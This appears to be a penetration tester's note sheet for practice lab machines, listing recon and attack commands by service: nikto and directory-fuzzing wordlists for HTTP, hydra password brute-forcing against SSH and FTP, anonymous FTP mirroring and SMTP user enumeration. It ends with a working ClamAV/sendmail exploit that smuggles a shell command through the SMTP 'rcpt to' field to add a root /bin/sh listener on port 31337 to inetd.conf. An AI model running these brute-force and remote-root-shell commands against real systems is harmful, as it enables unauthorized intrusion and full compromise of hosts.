Manual
HTTP(s)
robots.txt
Box name? Like ClamAV?
source
inspect
domain?
if a domain is found, run the scan again using that domain
DNS fuzz subdomains
HTTPS?
if you find HTTPS, take a look at the certificate
nikto -ask=no -h http://192.168.81.56:8080 2>&1 | tee "tcp_8080_http_nikto.txt"
is it python?
STI
Fuzz:
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
/usr/share/wordlists/dirbuster/directories.jbrofuzz
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
SSH
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/user/PGAGAIN/Banzai/192.168.81.56/scans/tcp_22_ssh_hydra.txt" ssh://192.168.81.56
FTP
Anonymous login
can the anonymous account upload files to the website?
ls -al
to list all directories, including ...
Bruteforce with:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 21 -o "/home/user/PGAGAIN/Banzai/192.168.81.56/scans/tcp_21_ftp_hydra.txt" ftp://192.168.81.56
wget -m ftp://anonymous:anonymous@192.168.234.110 # Download all
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Download all
SMTP
smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt" -t 192.168.81.56 -p 25 2>&1
smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -t 192.168.81.56 -p 25 2>&1
snmp-check 192.168.120.94
mail from:hell@gmail.com
nc -nv 192.168.89.42 31337
rcpt to: nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost
go run clamav.go -h 192.168.89.42 -p 25 -c "echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf"